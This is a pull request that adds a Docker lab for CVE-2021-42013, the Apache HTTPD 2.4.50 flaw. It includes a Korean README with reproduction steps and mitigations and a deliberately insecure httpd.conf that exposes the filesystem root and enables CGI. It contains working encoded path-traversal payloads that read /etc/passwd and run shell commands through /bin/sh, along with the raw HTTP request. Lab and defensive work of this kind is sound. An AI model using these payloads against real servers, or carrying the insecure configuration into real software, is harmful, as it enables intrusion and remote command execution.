### PR TITLE
Add CVE-2021-42013 Apache HTTPD lab

### DIFF
--- a/Apache/CVE-2021-42013/Dockerfile
+++ b/Apache/CVE-2021-42013/Dockerfile
@@ -1,0 +1,9 @@
+FROM httpd:2.4.50
+
+COPY httpd.conf /usr/local/apache2/conf/httpd.conf
+COPY htdocs/index.html /usr/local/apache2/htdocs/index.html
+COPY cgi-bin/vuln.sh /usr/local/apache2/cgi-bin/vuln.sh
+
+RUN chmod +x /usr/local/apache2/cgi-bin/vuln.sh
+
+EXPOSE 80

--- a/Apache/CVE-2021-42013/README.md
+++ b/Apache/CVE-2021-42013/README.md
@@ -1,0 +1,244 @@
+# CVE-2021-42013: Apache HTTP Server 2.4.50 Path Traversal / RCE
+
+## Contributors
+
+- [nomadY24](https://github.com/nomadY24)
+
+<br/>
+
+## 1. 취약점 요약
+
+CVE-2021-42013은 Apache HTTP Server 2.4.50에서 발생한 Path Traversal 및 Remote Code Execution 취약점이다.
+
+Apache HTTP Server 2.4.49에서 발견된 CVE-2021-41773에 대한 패치가 불완전하게 적용되면서, 2.4.50에서도 인코딩된 경로를 이용해 DocumentRoot 외부 파일에 접근할 수 있는 문제가 발생했다. 또한 CGI 기능이 활성화된 환경에서는 경로 탐색을 통해 `/bin/sh`와 같은 실행 파일에 접근하여 원격 명령 실행으로 이어질 수 있다.
+
+- CVE ID: CVE-2021-42013
+- 대상 소프트웨어: Apache HTTP Server
+- 취약 버전: Apache HTTP Server 2.4.50
+- 취약점 유형: Path Traversal / Remote Code Execution
+- 영향: 임의 파일 읽기, 원격 명령 실행
+- 실습 포트: 8083
+
+<br/>
+
+## 2. 환경 구성
+
+본 실습은 Docker Compose 기반으로 구성했다.
+
+```text
+Docker
+Docker Compose
+Apache HTTP Server 2.4.50
+CGI enabled
+```
+
+파일 구조는 다음과 같다.
+
+```text
+Apache/CVE-2021-42013/
+├── docker-compose.yml
+├── Dockerfile
+├── httpd.conf
+├── cgi-bin/
+│   └── vuln.sh
+├── htdocs/
+│   └── index.html
+├── README.md
+└── img/
+```
+
+`docker-compose.yml` 구성은 다음과 같다.
+
+```yaml
+services:
+  apache-cve-2021-42013:
+    build: .
+    container_name: apache-cve-2021-42013
+    ports:
+      - "8083:80"
+```
+
+환경 실행 명령은 다음과 같다.
+
+```bash
+docker compose up --build -d
+docker compose ps
+```
+
+실행 결과, Apache HTTP Server 2.4.50 컨테이너가 `8083` 포트로 정상 실행되는 것을 확인했다.
+
+![docker compose 실행 결과](./img/1-compose-up.png)
+
+<br/>
+
+## 3. 정상 동작 확인
+
+웹 서버가 정상적으로 실행되는지 확인했다.
+
+```bash
+curl -i http://localhost:8083/
+```
+
+응답에서 `HTTP/1.1 200 OK`와 Apache HTTP Server 2.4.50 환경 페이지가 출력되었다.
+
+![정상 페이지 확인](./img/2-normal-page.png)
+
+CGI 기능이 활성화되어 있는지도 확인했다.
+
+```bash
+curl -i http://localhost:8083/cgi-bin/vuln.sh
+```
+
+실행 결과는 다음과 같다.
+
+```text
+CGI script is working
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+```
+
+이를 통해 CGI 스크립트가 웹 서버 권한으로 실행되는 것을 확인했다.
+
+<br/>
+
+## 4. 취약 조건
+
+이 취약점은 다음 조건에서 악용 가능하다.
+
+1. Apache HTTP Server 2.4.50을 사용한다.
+2. URL 경로 정규화 및 인코딩 처리 우회가 가능하다.
+3. DocumentRoot 외부 경로 접근이 제한되지 않은 설정이 존재한다.
+4. CGI 기능이 활성화되어 있다.
+5. 공격자가 조작된 경로와 POST body를 포함한 HTTP 요청을 보낼 수 있다.
+
+<br/>
+
+## 5. 재현 절차
+
+### 5.1 취약 환경 실행
+
+```bash
+docker compose up --build -d
+docker compose ps
+```
+
+컨테이너 상태가 `Up`이고, 포트가 `0.0.0.0:8083->80/tcp`로 매핑되어 있으면 정상이다.
+
+### 5.2 정상 페이지 확인
+
+```bash
+curl -i http://localhost:8083/
+```
+
+정상 응답 예시는 다음과 같다.
+
+```text
+HTTP/1.1 200 OK
+Server: Apache/2.4.50 (Unix)
+
+Apache HTTP Server 2.4.50 CVE-2021-42013 Lab
+```
+
+### 5.3 CGI 동작 확인
+
+```bash
+curl -i http://localhost:8083/cgi-bin/vuln.sh
+```
+
+정상적으로 CGI가 활성화되어 있다면 다음과 같이 `daemon` 권한으로 실행된 결과가 출력된다.
+
+```text
+CGI script is working
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+```
+
+### 5.4 Path Traversal 확인
+
+다음 요청은 인코딩된 경로를 이용하여 DocumentRoot 외부 파일인 `/etc/passwd` 접근을 시도한다.
+
+```bash
+curl --path-as-is -i 'http://localhost:8083/assets/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+```
+
+성공 시 `/etc/passwd` 파일 내용이 응답에 포함된다.
+
+![Path Traversal 결과](./img/3-path-traversal.png)
+
+### 5.5 RCE PoC 실행
+
+CGI가 활성화된 환경에서는 경로 탐색을 통해 `/bin/sh`를 CGI 스크립트처럼 호출하여 명령 실행을 시도할 수 있다.
+
+```bash
+curl --path-as-is -i -X POST 'http://localhost:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' \
+  -d 'echo; touch /tmp/success; id'
+```
+
+위 요청은 `/bin/sh`에 POST body를 전달하고, `touch /tmp/success` 명령을 실행하도록 시도한다.
+
+![RCE PoC 결과](./img/4-rce-poc.png)
+
+<br/>
+
+## 6. Packet
+
+```http
+POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
+Host: localhost:8083
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 28
+
+echo; touch /tmp/success; id
+```
+
+<br/>
+
+## 7. 실행 결과
+
+PoC 요청 후 컨테이너 내부에 `/tmp/success` 파일이 생성되었는지 확인한다.
+
+```bash
+docker exec apache-cve-2021-42013 ls -l /tmp/success
+```
+
+파일이 존재하면 원격 명령 실행이 성공한 것이다.
+
+```text
+-rw-r--r-- 1 daemon daemon 0 ... /tmp/success
+```
+
+![success 파일 생성 확인](./img/5-success-check.png)
+
+<br/>
+
+## 8. 위험도 평가
+
+### Risk Score: 9.8 / 10.0
+
+CVE-2021-42013은 인증 없이 원격 HTTP 요청만으로 임의 파일 읽기와 원격 명령 실행으로 이어질 수 있는 취약점이다. CGI가 활성화된 환경에서는 공격자가 서버에서 임의 명령을 실행할 수 있으므로 기밀성, 무결성, 가용성에 모두 큰 영향을 준다.
+
+### Reproducibility: 90%
+
+Docker Compose로 Apache HTTP Server 2.4.50 환경을 실행하고, `curl` 요청으로 Path Traversal과 RCE를 확인할 수 있다. 외부 서비스 의존성이 거의 없고, 결과를 `/tmp/success` 파일 생성으로 확인할 수 있어 재현성이 높다.
+
+<br/>
+
+## 9. 대응 방안
+
+1. Apache HTTP Server를 2.4.51 이상 버전으로 업데이트한다.
+2. Apache HTTP Server 2.4.49 및 2.4.50 사용을 중단한다.
+3. CGI 기능이 필요하지 않다면 비활성화한다.
+4. `ScriptAlias`와 CGI 실행 경로를 최소화한다.
+5. DocumentRoot 외부 경로 접근을 차단한다.
+6. `<Directory />`에 대해 기본적으로 `Require all denied`를 적용한다.
+7. 경로 탐색 패턴인 `.%2e`, `%2e`, `.%%32%65` 등을 WAF 또는 웹 서버 룰에서 탐지하고 차단한다.
+8. 웹 서버 프로세스를 최소 권한 사용자로 실행한다.
+9. 비정상적인 `cgi-bin`, encoded traversal 요청 로그를 모니터링한다.
+
+<br/>
+
+## 10. 정리
+
+CVE-2021-42013은 Apache HTTP Server 2.4.50에서 발생한 Path Traversal 및 Remote Code Execution 취약점이다.
+
+본 실습에서는 Docker Compose로 취약한 Apache 2.4.50 환경을 구성하고, 인코딩된 경로를 이용해 DocumentRoot 외부 접근과 CGI 기반 명령 실행을 재현했다. 최종적으로 `/tmp/success` 파일 생성을 통해 RCE 성공 여부를 확인했다.
+
+실제 운영 환경에서는 Apache를 보안 패치가 적용된 버전으로 업데이트하고, CGI 기능 및 DocumentRoot 외부 접근을 엄격히 제한해야 한다.

--- a/Apache/CVE-2021-42013/cgi-bin/vuln.sh
+++ b/Apache/CVE-2021-42013/cgi-bin/vuln.sh
@@ -1,0 +1,5 @@
+#!/bin/sh
+echo "Content-Type: text/plain"
+echo
+echo "CGI script is working"
+id

--- a/Apache/CVE-2021-42013/docker-compose.yml
+++ b/Apache/CVE-2021-42013/docker-compose.yml
@@ -1,0 +1,6 @@
+services:
+  apache-cve-2021-42013:
+    build: .
+    container_name: apache-cve-2021-42013
+    ports:
+      - "8083:80"

--- a/Apache/CVE-2021-42013/htdocs/index.html
+++ b/Apache/CVE-2021-42013/htdocs/index.html
@@ -1,0 +1,11 @@
+<!doctype html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <title>CVE-2021-42013 Lab</title>
+</head>
+<body>
+  <h1>Apache HTTP Server 2.4.50 CVE-2021-42013 Lab</h1>
+  <p>Vulnerable Apache httpd 2.4.50 environment is running.</p>
+</body>
+</html>

--- a/Apache/CVE-2021-42013/httpd.conf
+++ b/Apache/CVE-2021-42013/httpd.conf
@@ -1,0 +1,51 @@
+ServerRoot "/usr/local/apache2"
+Listen 80
+ServerName localhost
+
+LoadModule mpm_event_module modules/mod_mpm_event.so
+LoadModule unixd_module modules/mod_unixd.so
+LoadModule authz_core_module modules/mod_authz_core.so
+LoadModule authz_host_module modules/mod_authz_host.so
+LoadModule dir_module modules/mod_dir.so
+LoadModule mime_module modules/mod_mime.so
+LoadModule log_config_module modules/mod_log_config.so
+LoadModule alias_module modules/mod_alias.so
+LoadModule cgid_module modules/mod_cgid.so
+
+User daemon
+Group daemon
+
+DocumentRoot "/usr/local/apache2/htdocs"
+
+<Directory />
+    AllowOverride None
+    Require all granted
+</Directory>
+
+Alias /assets/ "/usr/local/apache2/htdocs/"
+
+<Directory "/usr/local/apache2/htdocs">
+    Options Indexes FollowSymLinks
+    AllowOverride None
+    Require all granted
+</Directory>
+
+<Directory "/usr/local/apache2/htdocs">
+    Options Indexes FollowSymLinks
+    AllowOverride None
+    Require all granted
+</Directory>
+
+ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
+
+<Directory "/usr/local/apache2/cgi-bin">
+    AllowOverride None
+    Options +ExecCGI
+    SetHandler cgi-script
+    Require all granted
+</Directory>
+
+DirectoryIndex index.html
+
+ErrorLog /proc/self/fd/2
+CustomLog /proc/self/fd/1 common


### PR DESCRIPTION
## Summary

- Added Docker Compose environment for CVE-2021-42013
- Added Apache HTTP Server 2.4.50 lab files
- Added README with vulnerability summary, environment setup, reproduction steps, PoC, risk score, and mitigation

## Test

```bash
docker compose up --build -d
curl -i http://localhost:8083/
curl -i http://localhost:8083/cgi-bin/vuln.sh